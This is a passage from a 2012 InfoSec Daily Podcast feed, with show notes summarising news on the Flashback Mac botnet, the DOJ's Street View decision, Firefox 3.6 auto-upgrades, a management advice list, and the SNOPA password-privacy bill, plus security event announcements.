<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">At its height, Flashback contained more than 700,000 Mac machines and Symantec calculates that a botnet of that size could easily generate about $10,000 a day in click-fraud.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Source: </span>&nbsp;<a href="http://www.wired.com/threatlevel/2012/04/doj-google-streetview/"><span style="font-size: 15px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.wired.com/threatlevel/2012/04/doj-google-streetview</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The Justice Department has cleared Google of wiretapping violations in connection to the company secretly intercepting Americans&rsquo; data on unencrypted Wi-Fi routers for two years ending in 2010, Google said.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&ldquo;The DOJ had access to Google employees, reviewed the key documents, and concluded that it would not pursue a case for violation of the Wiretap Act,&rdquo; Google wrote in a </span><a href="http://www.wired.com/images_blogs/threatlevel/2012/04/googlettertofcc.pdf"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Thursday filing</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> (.pdf) with the Federal Communications Commission.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The Justice Department declined comment.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">If true, the development means that at least three government agencies &mdash; the FCC, Federal Trade Commission and the Justice Department &mdash; found Google committed no wrongdoing in the so-called Street View debacle.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Those outcomes, however, contradict a federal judge who last year ruled the search-and-advertising giant could be held liable for violating federal wiretapping law. The decision by U.S. District Judge James Ware of California green-lighted about a dozen lawsuits seeking damages &mdash; a decision that has been stayed pending Google&rsquo;s appeal.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Google has said it didn&rsquo;t realize it was sniffing packets of data on unsecured Wi-Fi networks in about a dozen countries between 2008 and 2010 until German privacy authorities began questioning what data Google&rsquo;s Street View mapping cars were collecting. Google, along with other companies, use databases of Wi-Fi networks and their locations to augment or replace GPS when attempting to figure out the location of a computer or mobile device.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">In Google&rsquo;s letter to the FCC, it said it would pay a $25,000 FCC fine, levied two weeks ago, to settle the agency&rsquo;s claims that Google stonewalled the commission&rsquo;s Streetview investigation. Google denied wrongdoing, but agreed to pay &ldquo;in order to put this investigation behind it.&rdquo;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Source: </span>&nbsp;<a href="http://www.h-online.com/security/news/item/Mozilla-to-auto-upgrade-Firefox-3-6-users-to-version-12-1563324.html"><span style="font-size: 15px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.h-online.com/security/news/item/Mozilla-to-auto-upgrade-Firefox-3-6-users-to-version-12-1563324.html</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Soon, users running Firefox 3.6.x will start being automatically upgraded to the current version 12.0 release of the open source web browser. The plan to auto-update these users has been being discussed since the end of March, when Mozilla Release Manager Alex Keybl proposed the move on a Mozilla </span><a href="https://groups.google.com/group/mozilla.dev.planning/browse_thread/thread/1fb8dda6f4f735b7/fd3284b0919a272b?q=%22firefox+3.6%22&amp;lnk=ol&amp;&amp;pli=1#"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">planning discussion thread</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><a href="http://www.computerworld.com/s/article/9226666/Mozilla_to_kill_Firefox_3.6_by_auto_upgrading_old_browser"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">According to Keybl</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">, Firefox 3.6.x users with updates enabled should start being upgraded in early May &ndash; the specific date has yet to be confirmed. The 3.6.x branch of Firefox, the first release of which arrived in January 2010, reached its end of life last week on 24 April; the last update to the 3.6 series was version 3.6.28 from early March.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">For users and organisations that don&#39;t want to upgrade to version 12 of Firefox because of the </span><a href="https://wiki.mozilla.org/RapidRelease"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Rapid Release process</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> &ndash; which sees a new browser update every six weeks &ndash; Mozilla has an </span><a href="https://www.mozilla.org/en-US/firefox/organizations/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Extended Support Release</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> (ESR) of Firefox specifically aimed at enterprises and other large organisations. The current Firefox ESR release, </span><a href="https://www.mozilla.org/en-US/firefox/10.0.4/releasenotes/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">version 10.0.4</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">, is based on Firefox 10.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Those who don&#39;t want to upgrade can turn off updates in Firefox &ndash; on Windows, updates can be disabled via Tools &gt; Options &gt; Advanced &gt; uncheck &quot;Firefox&quot; under &quot;Automatically check for updates&quot;. Mac users can access these settings from Preferences under the Firefox menu; however, some Mac OS X users will not be able to upgrade from 3.6.x as newer versions of Firefox no longer support PowerPC-based systems or version 10.4 of the operating system.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Source: </span>&nbsp;<a href="http://www.baselinemag.com/c/a/IT-Management/Ten-Things-Bad-Companies-Tell-Employees-616176"><span style="font-size: 15px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.baselinemag.com/c/a/IT-Management/Ten-Things-Bad-Companies-Tell-Employees-616176</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">While many companies claim to embrace change, it&rsquo;s hard to get people to move beyond their comfort zones. But enterprises need to embrace dynamic market changes and seek out new ways to grow as customer needs evolve. To help ensure the corporate culture evolves with the times, companies need to continually re-examine policies and procedures. The new book &ldquo;Kill The Company: End the Status Quo, Start an Innovation Revolution&rdquo; (Bibliomotion/Available in May) contends that work teams are often too confined by corporate behaviors, cultures and processes to take advantage of change. Author Lisa Bodell offers insights on moving beyond the status quo and embracing innovation. Managers who avoid these mistaken approaches can help make their company a market leader. Bodell is founder and CEO of futurethink, a global innovation training firm. For more about the book, </span><a href="http://www.killthecompany.com/book/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">click here</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">1. Don&rsquo;t: &ldquo;That&rsquo;s our department&rsquo;s business. Not yours.&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Encourage inter-departmental collaboration to drive success.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">2. Don&rsquo;t: &ldquo;If I wanted your ideas, I&rsquo;d ask for them.&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Seek ideas from bottom-up for fullest perspective of customer needs and trends.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">3. Don&rsquo;t: &ldquo;Failure is Not an Option.&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Understand that anything worth pursuing requires educated risks.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">4. Don&rsquo;t: &ldquo;Forget about it if it&rsquo;s not in your job description.&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Inspire talent to think outside their job description and work independently.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">5. Don&rsquo;t: &ldquo;Are you wasting time on Facebook again?&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Work with teams to come up with effective, external communications plans via Facebook and other social media sites.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">6. Don&rsquo;t: &ldquo;Let&rsquo;s focus on making our quota this month.&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Always keep the long-term goals of the organization foremost in mind.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">7. Don&rsquo;t: &ldquo;Sorry, that&rsquo;s not possible because of our processes.&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Eliminate processes that essentially serve as bottlenecks.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">8. Don&rsquo;t: &ldquo;There is no ROI on training expenses.&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Recognize the continued development of their employees as meaningful ROI.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">9. Don&rsquo;t: &ldquo;Our approach has stood the test of time.&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Maintain traditional branding while being flexible enough to adapt to changing market trends.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">10. Don&rsquo;t: &ldquo;Don&rsquo;t rock the boat.&rdquo; </span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Do: Embrace questions that constructively challenge your team.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Source: </span>&nbsp;<a href="http://www.cio.com/article/705302/Proposed_Bill_Would_Protect_Employees_Facebook_Passwords"><span style="font-size: 15px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.cio.com/article/705302/Proposed_Bill_Would_Protect_Employees_Facebook_Passwords</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A bill that would stop employers from requesting future hires&#39; social networking passwords has been filed in the U.S. House of Representatives. &nbsp;The bill, called the Social Networking Online Protection Act, or SNOPA, was filed Friday by Rep. Eliot Engel (D &#8211; New York) and Rep. Jan Schakowsky (D &#8211; Illinois). The proposed law would not only prohibit employers from asking current and potential employees for the usernames and passwords to their social networking accounts, it would also prohibit colleges, universities, and K-12 schools from asking the same of their students. The bill would also bar employers and schools from demanding access to such accounts or online content, and from punishing employees and students who refuse to volunteer the information.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;Several states, including New York, have begun addressing this issue,&quot; Rep. Engel said in a statement. &quot;But we need a federal statute to protect all Americans across the country.&quot;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A bill to protect employees&#39; passwords from snooping bosses is currently on the governor&#39;s desk in Maryland, waiting to be signed into law. Nine similar measures have been introduced around the country, but they have yet to clear the committees they were referred to.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Rep. Engel claims the legislation is a line in the sand that defines what&#39;s private.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;No one would feel comfortable going to a public place and giving out their username and passwords to total strangers,&quot; he said. &quot;They should not be required to do so at work, school, or while trying to obtain work or an education. This is a matter of personal privacy and makes sense in our digital world.&quot;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">[end]</span></b></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-657-flashbuck-trojan-google-cleared-mozilla-forced-upgrade-10-things-and-support-snopa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3875/0/infosec-daily-podcast-episode-657.mp3" length="21078395" type="audio/mpeg" />
		<itunes:duration>0:43:52</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 657 for May 1, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Themson Mester.

	
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012
	Wh[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 657 for May 1, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Themson Mester.

	
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org

	
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/

	
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org

	
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014

	
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training

	
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

	
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com

	
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com

	
Please consider making your &#160;Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
Or simply use our QR Code Links.
Amazon:
	
Amazon UK:
	
You don't have a sufficient version of Flash Player to display this animation.

	
Stories
Source: https://www.zdnet.com/blog/security/mac-botnet-generated-10000-a-day-for-flashback-gang/11727
Security researchers at Symantec are estimating that the cyber-criminals behind the Flashback Mac OS X botnet may have raked in about $10,000 a day.
In a new blog post that discusses the business model of the botnet, Symantec found that Flashback was robbing Google of advertising dollars by redirecting clicks from infected Mac OS X machines and stealing the ad revenue.
At its height, Flashback contained more than 700,000 Mac machines and Symantec calculates that a botnet of that size could easily generate about $10,000 a day in click-fraud.
&#8230;.
Source: &#160;http://www.wired.com/threatlevel/2012/04/doj-google-streetview
The Justice Department has cleared Google of wiretapping violations in connection to the company secretly intercepting Americans&#8217; data on unencrypted Wi-Fi routers for two years ending in 2010, Google said.
&#8220;The DOJ had access to Google employees, reviewed the key documents, and concluded that it would not pursue a case for violation of the Wiretap Act,&#8221; Google wrote in a Thursday filing (.pdf) with the Federal Communications Commission.
The Justice Department declined comment.
If true, the development means that at least three government agencies &#8212; the FCC, Federal Trade Commission and the Justice Department &#8212; found Google committed no wrongdoing in the so-called Street View debacle.
Those outcomes, however, contradict a federal judge who last year ruled the search-and-advertising giant could be held liable for violating federal wiretapping law. The decision by U.S. District Judge James Ware of California green-lighted about a dozen lawsuits seeking damages &#8212; a decision that has been stayed pending Google&#8217;s appeal.
Google has said it didn&#8217;t realize it was sniffing packets of data on unsecured Wi-Fi networks in about a dozen countries between 2008 and 2010 until German privacy authorities began questioning what data Google&#8217;s Street View mapping cars were collecting. Google, along with other companies, use databases of Wi-Fi networks a[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 656 &#8211; Skype IP Revealer, Another 0-day, Oracle  Disclosure, UK2, and Religious Malware</title>
		<link>http://www.isdpodcast.com/episode-656-skype-ip-revealer-another-0-day-oracle-disclosure-uk2-and-religious-malware</link>
		<comments>http://www.isdpodcast.com/episode-656-skype-ip-revealer-another-0-day-oracle-disclosure-uk2-and-religious-malware#comments</comments>
		<pubDate>Tue, 01 May 2012 00:57:12 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3858</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 656 for April 30, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods and Karthik Rangarajan. Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012 Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec4.eventbrite.com AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center [...]]]></description>
			<content:encoded><![CDATA[<p><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">InfoSec Daily Podcast Episode 656 for April 30, 2012. </span><span style="font-size: 16px; vertical-align: baseline; ">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods and Karthik Rangarajan.</span></b></p>
<div dir="ltr">
<div dir="ltr"><b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; text-decoration: underline; vertical-align: baseline; ">Announcements</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">GraniteSec (formerly The New England InfoSec Tweetup)<br />
			</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: &nbsp;May 19, 2012<br />
			Where: &nbsp;Veasey Memorial Park, Groveland, MA<br />
			</span><a href="http://granitesec4.eventbrite.com/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://granitesec4.eventbrite.com</span></a></b></div>
<p>		<b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">AIDE 2012<br />
			</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: May 21-25, 2012<br />
			Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br />
			</span><a href="http://www.appyide.org/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://www.appyide.org/</span></a></b></div>
<p>		<b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">LayerOne 2012<br />
			</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: May 26-27, 2012<br />
			Where: Clarion Hotel &#8211; Anaheim, CA<br />
			</span><a href="http://www.layerone.org/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://www.layerone.org</span></a></b></div>
<p>		<b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br />
			</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: June 20 &#8211; 27, 2012<br />
			Where: Courtyard Seattle Federal Way, WA <br />
			</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://www.sans.org/mentor/details.php?nid=28014</span></a></b></div>
<p>		<b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Social Engineering Training</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: July 21-24, 2012<br />
			Where: Black Hat Vegas</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: August 20-24, 2012<br />
			Where: &nbsp;Bristol, UK</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: &nbsp;November 12-16, 2012<br />
			Where: &nbsp;Columbia, MD<br />
			</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://www.social-engineer.com/social-engineer-training</span></a></b></div>
